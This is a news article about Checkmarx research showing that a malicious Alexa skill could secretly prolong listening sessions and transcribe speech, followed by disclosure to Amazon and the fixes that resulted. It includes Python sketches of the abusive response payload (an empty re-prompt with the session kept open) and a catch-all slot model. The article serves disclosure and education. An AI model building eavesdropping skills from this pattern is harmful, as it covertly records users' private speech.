Posted on May 1, 2018 at 5:13 PM
Alexa, Amazon’s well-known cloud-based virtual assistant developed for the Amazon Echo, can be abused to eavesdrop on its users. This discovery comes from security researchers at Checkmarx.
If you were wondering just how popular the Alexa virtual assistant really is, let’s just say that “she” is present on over 31 million devices around the world. After the device detects its wake-up phrase (“Alexa”), user interaction is enabled, and the IPA (Intelligent Personal Assistant) can launch requested apps or capabilities. These are commonly known as skills, and they can come built into the device or be installed from the Skills Store.
How does this work?
As part of their experiment, researchers from Checkmarx managed to create a malicious skill. Once installed, this application can record speech in the background without the user’s awareness. However, since the wake-up phrase is needed for the device to start working, recording can only begin after the device has been activated.
The problem lies in the fact that the so-called “listening session”, which normally ends after the device delivers its response, doesn’t end if this malicious skill is installed. The session remains active, and the user is completely unaware that the device keeps recording everything they say.
Normally, the “shouldEndSession” flag allows a single session to remain alive for an extra cycle, even after the response has been delivered to the user. However, delivering that response, which involves reading text back to the user, would reveal that the device is still listening. This is an obstacle the researchers eventually managed to overcome by using the re-prompt feature.
A re-prompt works much the same way, but with one difference: it also accepts empty re-prompts. An entirely new listening cycle begins, while the user is never alerted to it.
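To make the mechanism concrete, here is a minimal sketch of the kind of response payload an Alexa skill returns. The field names follow the public Alexa Skills Kit response format; the helper function and the specific text values are illustrative, not the researchers’ actual code.

```python
import json

def build_response(speech_text, reprompt_text, end_session):
    """Build a minimal ASK-style JSON response payload."""
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {"type": "PlainText", "text": speech_text},
            "reprompt": {
                "outputSpeech": {"type": "PlainText", "text": reprompt_text}
            },
            "shouldEndSession": end_session,
        },
    }

# A benign skill answers and closes the session:
benign = build_response("Here is your answer.",
                        "Can I help with anything else?", True)

# The malicious pattern: keep the session open (shouldEndSession false)
# and re-prompt with empty text, so the microphone reopens without
# Alexa saying anything audible to the user.
malicious = build_response("Here is your answer.", "", False)

print(json.dumps(malicious, indent=2))
```

The key point is the combination: `shouldEndSession` alone keeps the session alive only if a response is read aloud, while the empty re-prompt restarts listening silently.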
Having resolved this issue, the researchers needed a way to transcribe the voice that the malicious skill recorded. To do so, they implemented a new slot type that can capture any and all words spoken in the device’s presence; the slot is not limited to a specific list of previously defined words. The researchers also created a new formatted string that works for practically any length of captured speech.
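The slot trick can be sketched as an interaction-model fragment. The intent, slot, and type names below are hypothetical, not taken from the Checkmarx research: the idea is that a custom slot type is declared with a few sample values, but at runtime the recognizer is not strictly limited to that list, so each slot can end up holding an arbitrary spoken word, and chaining several slots in one sample utterance catches phrases of almost any length.

```python
# Hypothetical interaction-model fragment illustrating a catch-all slot.
interaction_model = {
    "intents": [
        {
            "name": "CatchAllIntent",
            # Several generic word slots chained together.
            "slots": [
                {"name": f"word{i}", "type": "CATCH_ALL_WORDS"}
                for i in range(1, 6)
            ],
            # Each {wordN} placeholder may match one spoken word.
            "samples": ["{word1} {word2} {word3} {word4} {word5}"],
        }
    ],
    "types": [
        {
            "name": "CATCH_ALL_WORDS",
            # Sample values bias recognition; they do not restrict it.
            "values": ["hello", "please", "today"],
        }
    ],
}

# The transcript is reassembled by concatenating the filled slots in order.
captured = {"word1": "meet", "word2": "me", "word3": "at", "word4": "noon"}
transcript = " ".join(captured[key] for key in sorted(captured))
print(transcript)  # -> "meet me at noon"
```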
Is there no way of knowing that the device is recording?
Usually, when the device activates and starts listening to the user, it turns on a bright blue light that serves as a visual indicator. However, several AVS (Alexa Voice Services) vendors are able to use the virtual assistant without any visual indicators. And of course, there is always the possibility that the user will simply overlook the light.
The researchers acknowledged that the light is a good indicator that the device is working. However, these devices differ from smartphones and similar gadgets in that you don’t have to look at them to use them. You can put one in a corner of the room and use it whenever the need arises. Since operation is voice-based, the user might never see the light that stays on, indicating that the device is continuing the listening session.
The session continues for as long as the device can hear speech and recognize individual words to record. If the device registers only silence, Alexa will usually end the session after 8 seconds. Through the malicious skill, however, this period is prolonged to 16 seconds.
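The timing described above can be modeled with a toy calculation. This is an assumption-laden sketch, not Amazon’s implementation: the point is simply that each empty re-prompt grants the skill one more full silence window.

```python
# Toy model of the silence-timeout behavior described in the article.
NORMAL_SILENCE_TIMEOUT = 8  # seconds of silence before Alexa gives up

def max_silent_listening(reprompt_cycles):
    """Total seconds of silence tolerated before the session finally ends.

    The initial listen waits out one full timeout; each empty re-prompt
    restarts the clock for another full window.
    """
    return NORMAL_SILENCE_TIMEOUT * (1 + reprompt_cycles)

print(max_silent_listening(0))  # benign skill: 8 seconds
print(max_silent_listening(1))  # one empty re-prompt: 16 seconds
```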
After the discovery, Checkmarx quickly reported its findings to Amazon, and the two companies are now working together to mitigate the risks. New criteria were introduced that are meant to recognize, and reject, skills that could be used for eavesdropping. In addition, the devices will now flag unusually long sessions, as well as empty re-prompts, that might indicate suspicious activity.
The researchers published a demonstration of how the eavesdropping works in the form of this video.